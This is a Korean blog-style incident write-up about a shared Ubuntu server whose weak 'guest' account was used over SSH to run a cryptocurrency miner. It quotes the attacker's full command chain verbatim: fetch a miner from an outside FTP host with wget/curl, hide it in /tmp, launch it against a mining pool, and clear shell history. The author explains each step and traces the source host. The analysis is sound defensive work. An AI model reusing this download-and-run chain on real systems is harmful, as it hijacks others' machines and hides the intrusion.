여러명에서 사용하는 공동적인 우분투 서버(Ubuntu 16.04)가 있다.
이 서버에 오늘 새로운 사용자를 추가하고 접속하는 기록을 보기 위해 w(현재 접속자를 보기 위한 명령어)를 사용했다.

guest라는 계정은 임시 계정으로서 비밀번호가 취약하게 설정되어 있다고 판단되었다. 단순히 간단하게 설정된 패스워드와 잘 알려진 계정명을 통해 SSH로그인을 성공한 것으로 보인다.
이 글을 쓰고 있을 당시에는 guest의 패스워드를 바꾼 후이다.
현재 하고 있는 일은 miner를 동작하는 것으로 보인다. 명령어의 전부를 보기 위해 ps -aux | grep guest 명령어를 이용하여 해당 guest계정의 프로세스 리스트를 출력 하였다.

SSH에 연결되었다는 것을 나타내는 것과 miner를 돌리고 있는 명령어를 볼 수 있다.
miner를 돌리는 명령어를 정리하면 다음과 같다.
1. bash -c pkill minerd; pkill nohup; cd /tmp; wget ftp://[IP_B]/miner.tar; curl -O ftp://[IP_B]/miner.tar; tar -xvf miner.tar; rm -rf miner.tar; mv miner .miner; cd .miner; chmod 777 *; nohup ./minerd -a yescrypt -o stratum+tcp://stratum.eu.miners-pool.eu:8428 -u [Wallet_Address]; history -c
위 명령어는 ";"으로 여러 명령어를 한 라인으로 순차적 실행시키며 순서대로 다음과 같다. (추측성 해설)
1.1 bash -c pkill minerd; : bash로 minerd 프로세스를 kill한다.
1.2 pkill nohup; : nohup 프로세스를 kill한다.
1.3 cd /tmp; : tmp폴더로 이동한다.
1.4 wget ftp://[IP_B]/miner.tar; : ftp서버로 부터 miner프로그램을 받아온다. (IP주소는 마스킹함.)
1.5 curl -O ftp://[IP_B]/miner.tar; : ftp서버로 부터 miner프로그램을 받아온다. ==> wget이 사용불가일때 대응? (IP주소는 마스킹함.)
1.6 tar -xvf miner.tar; : 받아온 파일을 압축해제한다.
1.7 rm -rf miner.tar; : 압축해제를 하였으니 받아온 압축 파일을 삭제한다.
1.8 mv miner .miner; : miner폴더는 압축이 해제된 폴더이니 이것을 ls명령어를 통해 보이지 않기 위해 .miner로 변경한다.
1.9 cd .miner; chmod 777 *; : 폴더 권한을 777로 바꾼다.
1.10 nohup ./minerd -a yescrypt -o stratum+tcp://stratum.eu.miners-pool.eu:8428 -u [Wallet_Address_A]; : miner를 실행한다.
1.11 history -c : 명령어를 사용한 history를 삭제한다.
2. ./minerd -a yescrypt -o stratum+tcp://stratum.eu.miners-pool.eu:8428 -u [Wallet_Adderss_A]
해당 명령의 PPID가 1.인 것으로 보아 1.에서 실행된다는 것을 알 수 있다.
다행인 것은 "서버의 CPU 성능이 후져 마이닝이 1도 되지 않는다"
그 다음은 IP를 통해 누구인지 찾아보았다.
일단 FTP서버의 아이피 IP_B의 80번 포트를 보았다.
하얗다.
소스코드를 본다.
해당 페이지를 소스코드 보기를 통해 보면 주석처리된 php코드를 볼 수 있다. 주석처리된 php코드는 file_get_contents('[URL_A]')로 다른 페이지의 소스를 그대로 가져오는 소스코드이다.
다른 주석은
//Below is your backed up index
//Please donate some bitcoins for checking your site vulnerability
//I will be glad if you co-operate
//donation address: [Wallet_Address_B]
이며,
예상컨데 해당 서버도 탈취당한 서버이며 해당 서버에 ftp를 통해 악성행위를 하는 것같다.
위에 나온 URL_A 페이지에 접속해보면 다음과 같은 페이지(블러 처리 및 워터마크? 처리 함.)와 노래가 같이 나온다.

IP_A와 IP_B모두 국내가 아니였으며 Wallet의 거래 기록을 보면 소액 거래만 있었다는 점에서 더 알 수 있는점이 있을것 같다.